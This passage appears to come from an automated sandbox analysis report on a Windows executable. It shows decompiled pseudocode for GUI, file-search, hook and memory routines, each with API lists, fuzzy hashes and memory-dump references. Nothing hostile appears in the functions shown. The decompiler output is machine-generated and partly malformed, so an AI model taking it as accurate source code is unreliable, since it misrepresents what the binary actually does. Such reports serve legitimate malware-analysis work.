                                                                        0x004237a4
                                                                        0x004237ae
                                                                        0x004237ae
                                                                        0x004237c1
                                                                        0x004237c4
                                                                        0x004237c9
                                                                        0x004237e7
                                                                        0x004237cb
                                                                        0x004237cb
                                                                        0x004237cd
                                                                        0x004237ce
                                                                        0x004237cf
                                                                        0x004237d7
                                                                        0x004237da
                                                                        0x004237db
                                                                        0x004237db
                                                                        0x004237ef
                                                                        0x004237f7
                                                                        0x004237fc
                                                                        0x00423803
                                                                        0x00423806
                                                                        0x00423809
                                                                        0x00423816
                                                                        0x00423816

                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7A590.GDI32(00000000,00000000,00423817), ref: 0042378D
                                                                        • SelectObject.GDI32(00000000,?), ref: 004237A6
                                                                        • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00423817), ref: 004237CF
                                                                        • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00423817), ref: 004237DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                        • String ID:
                                                                        • API String ID: 2198039625-0
                                                                        • Opcode ID: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction ID: c88b5c0543f23b78fd250c8d9274629173d69d4b00430ff76432291ce0c063de
                                                                        • Opcode Fuzzy Hash: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction Fuzzy Hash: E0310874B04654EFDB04EF5AD981D4DB3F5EF48714B6281A6F804AB362C738EE80DA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0044A130, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0044A130(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E0044983C(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004496B8(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004496B8(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408CB4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E00408BF8(_a12, _t49);
				}
			}










                                                                        0x0044a137
                                                                        0x0044a139
                                                                        0x0044a13b
                                                                        0x0044a146
                                                                        0x00000000
                                                                        0x0044a1ca
                                                                        0x0044a14a
                                                                        0x0044a15a
                                                                        0x0044a177
                                                                        0x0044a17c
                                                                        0x0044a181
                                                                        0x0044a18e
                                                                        0x0044a18e
                                                                        0x0044a15c
                                                                        0x0044a163
                                                                        0x0044a170
                                                                        0x0044a170
                                                                        0x0044a195
                                                                        0x00000000
                                                                        0x0044a197
                                                                        0x0044a19a
                                                                        0x0044a1a9
                                                                        0x00000000
                                                                        0x0044a1b1

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Menu$ItemStateString
                                                                        • String ID:
                                                                        • API String ID: 306270399-0
                                                                        • Opcode ID: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction ID: a086aaca1138dc505a42b3517b193e50cf2349fe978f08e3be5af1dc0d792112
                                                                        • Opcode Fuzzy Hash: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction Fuzzy Hash: 64117F31602214AFDB00EF2D8C81AAF77E89F4A364F10446AF819E7382D6389D11D769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0045BF2C, Relevance: 6.1, APIs: 4, Instructions: 68windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0045BF2C(intOrPtr* __eax, int __ecx, RECT* __edx) {
				int _t9;
				int _t12;
				int _t26;
				int _t34;
				int _t37;
				intOrPtr* _t43;
				int* _t44;

				_t37 = __ecx;
				_t44 = __edx;
				_t43 = __eax;
				_t9 = IsRectEmpty(__edx);
				_t47 = _t9;
				if(_t9 != 0) {
					return E0045BEC4(_t43, _t47);
				}
				 *((intOrPtr*)( *_t43 + 0x94))();
				__eflags = _t37;
				if(_t37 != 0) {
					L5:
					_t12 = 1;
				} else {
					_t34 = IsWindowVisible(E0043CC2C(_t43));
					__eflags = _t34;
					if(_t34 == 0) {
						goto L5;
					} else {
						_t12 = 0;
					}
				}
				E0045BE40(_t43);
				SetWindowPos(E0043CC2C(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
				 *((intOrPtr*)( *_t43 + 0xf8))();
				__eflags = _t12;
				if(__eflags != 0) {
					E0045BE40(_t43);
				}
				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
				__eflags = _t26;
				if(_t26 != 0) {
					return SetFocus(E0043CC2C(_t43));
				}
				return _t26;
			}










                                                                        0x0045bf30
                                                                        0x0045bf32
                                                                        0x0045bf34
                                                                        0x0045bf37
                                                                        0x0045bf3c
                                                                        0x0045bf3e
                                                                        0x00000000
                                                                        0x0045bf42
                                                                        0x0045bf50
                                                                        0x0045bf56
                                                                        0x0045bf58
                                                                        0x0045bf6f
                                                                        0x0045bf6f
                                                                        0x0045bf5a
                                                                        0x0045bf62
                                                                        0x0045bf67
                                                                        0x0045bf69
                                                                        0x00000000
                                                                        0x0045bf6b
                                                                        0x0045bf6b
                                                                        0x0045bf6b
                                                                        0x0045bf69
                                                                        0x0045bf75
                                                                        0x0045bf9a
                                                                        0x0045bfa3
                                                                        0x0045bfa9
                                                                        0x0045bfab
                                                                        0x0045bfaf
                                                                        0x0045bfaf
                                                                        0x0045bfbe
                                                                        0x0045bfc3
                                                                        0x0045bfc5
                                                                        0x00000000
                                                                        0x0045bfcf
                                                                        0x0045bfd8

                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 0045BF37
                                                                        • IsWindowVisible.USER32(00000000), ref: 0045BF62
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BF9A
                                                                        • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BFCF
                                                                          • Part of subcall function 0045BEC4: IsWindowVisible.USER32(00000000), ref: 0045BEDB
                                                                          • Part of subcall function 0045BEC4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF02
                                                                          • Part of subcall function 0045BEC4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$FocusVisible$EmptyRect
                                                                        • String ID:
                                                                        • API String ID: 698668684-0
                                                                        • Opcode ID: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction ID: 0c7870d5d9d24088c3abd12cb0ef2774cc45ea1f721d3d528cff2115086cf705
                                                                        • Opcode Fuzzy Hash: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction Fuzzy Hash: 1B1177713002016BD511BA7A8D85A6BB79DDF45345B08056AFD48DB343CB2DEC0697AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00422948, Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00422948(int __eax, intOrPtr __ecx, void* __edx) {
				struct tagRECT _v32;
				int _t11;
				void* _t21;
				void* _t23;
				int _t26;
				void* _t30;
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t36;

				_t11 = __eax;
				_v32.bottom = __ecx;
				_t30 = __edx;
				_t26 = __eax;
				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
					_t36 = 0;
					if(_t33 != 0) {
						_push(0xffffffff);
						_push(_t33);
						_t23 = E00420730(__edx);
						_push(_t23);
						L00406C5C();
						_t36 = _t23;
						_push(E00420730(_t30));
						L00406C2C();
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t32 = _t30;
					_t35 = _t33;
					_v32.right = _v32.right - 1;
					_v32.bottom = _v32.bottom - 1;
					_t11 = PlayEnhMetaFile(E00420730(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
					if(_t35 != 0) {
						_push(0xffffffff);
						_push(_t36);
						_t21 = E00420730(_t32);
						_push(_t21);
						L00406C5C();
						return _t21;
					}
				}
				return _t11;
			}













                                                                        0x00422948
                                                                        0x0042294f
                                                                        0x00422952
                                                                        0x00422954
                                                                        0x0042295a
                                                                        0x00422963
                                                                        0x00422965
                                                                        0x00422969
                                                                        0x0042296b
                                                                        0x0042296d
                                                                        0x00422970
                                                                        0x00422975
                                                                        0x00422976
                                                                        0x0042297b
                                                                        0x00422984
                                                                        0x00422985
                                                                        0x00422985
                                                                        0x00422995
                                                                        0x00422996
                                                                        0x00422997
                                                                        0x00422998
                                                                        0x00422999
                                                                        0x0042299a
                                                                        0x0042299b
                                                                        0x0042299f
                                                                        0x004229b7
                                                                        0x004229be
                                                                        0x004229c0
                                                                        0x004229c2
                                                                        0x004229c5
                                                                        0x004229ca
                                                                        0x004229cb
                                                                        0x00000000
                                                                        0x004229cb
                                                                        0x004229be
                                                                        0x004229d7

                                                                        APIs
                                                                        • 72E7B410.GDI32(00000000,00000000,000000FF), ref: 00422976
                                                                        • 72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 00422985
                                                                        • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 004229B7
                                                                        • 72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 004229CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B410$B150FileMetaPlay
                                                                        • String ID:
                                                                        • API String ID: 1962039817-0
                                                                        • Opcode ID: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction ID: 088bed5f8542f6c822edce03a29eb1a8d7af9251e81d94029e29098bb0995351
                                                                        • Opcode Fuzzy Hash: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction Fuzzy Hash: 7301A5717082206BC210BB699C8495BB3DDDF85320F06063BB858EB382D679EC40DAD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004555D8, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004555D8(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x496c04; // 0x2150d40
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00455568, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00414208( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                                                        0x004555da
                                                                        0x004555dd
                                                                        0x004555df
                                                                        0x004555e8
                                                                        0x004555f5
                                                                        0x004555fe
                                                                        0x00455601
                                                                        0x0045560d
                                                                        0x00455612
                                                                        0x00455612
                                                                        0x0045561c
                                                                        0x0045562a
                                                                        0x0045562c
                                                                        0x00455639
                                                                        0x0045563b
                                                                        0x0045563b
                                                                        0x00455642
                                                                        0x00455642
                                                                        0x0045564b
                                                                        0x0045564f
                                                                        0x00455651
                                                                        0x00455665
                                                                        0x00455671
                                                                        0x00455676
                                                                        0x00455677
                                                                        0x00455651
                                                                        0x0045564f
                                                                        0x0045561c
                                                                        0x0045567c
                                                                        0x0045567c
                                                                        0x00455686

                                                                        APIs
                                                                        • EnumWindows.USER32(00455568), ref: 0045560D
                                                                        • GetWindow.USER32(00000003,00000003), ref: 00455625
                                                                        • GetWindowLongA.USER32 ref: 00455632
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455671
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Window$EnumLongWindows
                                                                        • String ID:
                                                                        • API String ID: 4191631535-0
                                                                        • Opcode ID: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction ID: 2c8fcb29ad70036d63b1f57068b34d5d0e3d2e3afda160b4fc5bec8406b8bc50
                                                                        • Opcode Fuzzy Hash: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction Fuzzy Hash: 94115170604650AFDB10AB2CCC95FA673D8EB04725F55017AFD98AB2D3C3749C44C799
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00408954, Relevance: 6.0, APIs: 4, Instructions: 39timefileCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00408954(WORD* __eax) {
				struct _FILETIME _v12;
				long _t20;
				WORD* _t30;
				void* _t35;
				struct _FILETIME* _t36;

				_t36 = _t35 + 0xfffffff8;
				_t30 = __eax;
				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
						continue;
					} else {
						_t20 = GetLastError();
					}
					L5:
					return _t20;
				}
				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
				_t30[2] = _t30[0x1c];
				_t30[4] = _t30[0xc].dwFileAttributes;
				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
				_t20 = 0;
				goto L5;
			}








                                                                        0x00408955
                                                                        0x00408958
                                                                        0x00408974
                                                                        0x0040896b
                                                                        0x00000000
                                                                        0x0040896d
                                                                        0x0040896d
                                                                        0x0040896d
                                                                        0x004089b3
                                                                        0x004089b6
                                                                        0x004089b6
                                                                        0x00408981
                                                                        0x00408990
                                                                        0x00408998
                                                                        0x0040899e
                                                                        0x004089ac
                                                                        0x004089b1
                                                                        0x00000000

                                                                        APIs
                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00408964
                                                                        • GetLastError.KERNEL32(?,?), ref: 0040896D
                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                        • FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: FileTime$DateErrorFindLastLocalNext
                                                                        • String ID:
                                                                        • API String ID: 2103556486-0
                                                                        • Opcode ID: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction ID: 56775c696c456fa3967af653f38531e12ac447ffae477507b2a71b5a2badd77f
                                                                        • Opcode Fuzzy Hash: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction Fuzzy Hash: B2F012B25052019FCB44FF64C9C289737DC9B4431471085B7AD45DB287E638D558C7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00454EF4, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00454EF4(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x496c04; // 0x2150d40
				if( *((char*)(_t2 + 0xa5)) == 0) {
					if( *0x496c1c == 0) {
						_t2 = SetWindowsHookExA(3, E00454EB0, 0, GetCurrentThreadId());
						 *0x496c1c = _t2;
					}
					if( *0x496c18 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x496c18 = _t2;
					}
					if( *0x496c20 == 0) {
						_t2 = CreateThread(0, 0x3e8, E00454E54, 0, 0, _t7);
						 *0x496c20 = _t2;
					}
				}
				return _t2;
			}





                                                                        0x00454ef5
                                                                        0x00454f01
                                                                        0x00454f0a
                                                                        0x00454f1c
                                                                        0x00454f21
                                                                        0x00454f21
                                                                        0x00454f2d
                                                                        0x00454f37
                                                                        0x00454f3c
                                                                        0x00454f3c
                                                                        0x00454f48
                                                                        0x00454f5b
                                                                        0x00454f60
                                                                        0x00454f60
                                                                        0x00454f48
                                                                        0x00454f66

                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F0C
                                                                        • SetWindowsHookExA.USER32 ref: 00454F1C
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00457722,?,?,02150D40,?,?,00457150,?), ref: 00454F37
                                                                        • CreateThread.KERNEL32(00000000,000003E8,00454E54,00000000,00000000), ref: 00454F5B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CreateThread$CurrentEventHookWindows
                                                                        • String ID:
                                                                        • API String ID: 1195359707-0
                                                                        • Opcode ID: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction ID: 733cf5ddf0306959f392ce9496ddc13725008b47f7b701b11ded11e2ae76990f
                                                                        • Opcode Fuzzy Hash: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction Fuzzy Hash: C0F03071A843006EF610AB15AD47F163694E364B1BF12403BFA447E1D2CBB914C48A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00423FFC, Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 28%
                                                                        			E00423FFC(void* __eflags) {
				intOrPtr _t13;
				intOrPtr _t19;
				void* _t20;

				DeleteObject( *(_t20 - 0x10));
				E00403DD0();
				E00403E24();
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x42404d);
				DeleteDC( *(_t20 - 0x1c));
				_t13 =  *((intOrPtr*)(_t20 - 0x18));
				_push(_t13);
				_push(0);
				L00407124();
				if( *(_t20 - 0x10) != 0) {
					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
				}
				return _t13;
			}






                                                                        0x00424000
                                                                        0x00424005
                                                                        0x0042400a
                                                                        0x00424011
                                                                        0x00424014
                                                                        0x00424017
                                                                        0x00424020
                                                                        0x00424025
                                                                        0x00424028
                                                                        0x00424029
                                                                        0x0042402b
                                                                        0x00424034
                                                                        0x00000000
                                                                        0x00424040
                                                                        0x00424045

                                                                        APIs
                                                                        • DeleteObject.GDI32(?), ref: 00424000
                                                                        • DeleteDC.GDI32(?), ref: 00424020
                                                                        • 72E7B380.USER32(00000000,?,?,0042404D), ref: 0042402B
                                                                        • GetObjectA.GDI32(?,00000054,?), ref: 00424040
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DeleteObject$B380
                                                                        • String ID:
                                                                        • API String ID: 2559486108-0
                                                                        • Opcode ID: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction ID: 234183355323d449e4e0ea259c9d81100d714ff255df05ef953365b2e2b4a470
                                                                        • Opcode Fuzzy Hash: d882ca4a59d74ba7fcd23cff5cfbfdf04719c013bf3bc46bbc777ebace02f49a
                                                                        • Instruction Fuzzy Hash: 29E0C071A04115AADB10EBE5D846A7E77F8EF44305F41446AB610E71C1C67DA850C729
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 11memoryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E004072D8(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





                                                                        0x004072db
                                                                        0x004072e2
                                                                        0x004072e7
                                                                        0x004072ed
                                                                        0x004072f2

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Global$AllocHandleWire
                                                                        • String ID:
                                                                        • API String ID: 2210401237-0
                                                                        • Opcode ID: df11f4c69f4483118d121b3d8c8dbb1e2530246ed1590a5db0f886877fcb1417
                                                                        • Instruction ID: 259ab7e85c60211505b58427907bbc6fc2cc1ee7dc874fbd9d5750fb2c8aca08
                                                                        • Opcode Fuzzy Hash: df11f4c69f4483118d121b3d8c8dbb1e2530246ed1590a5db0f886877fcb1417
                                                                        • Instruction Fuzzy Hash: DEB009C4820222BCE80473B34C0BE3B289C9880B1C383497F3406B2C83987E982841BA
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004348FC, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 83%
                                                                        			E004348FC(intOrPtr __eax, intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct tagPOINT _v20;
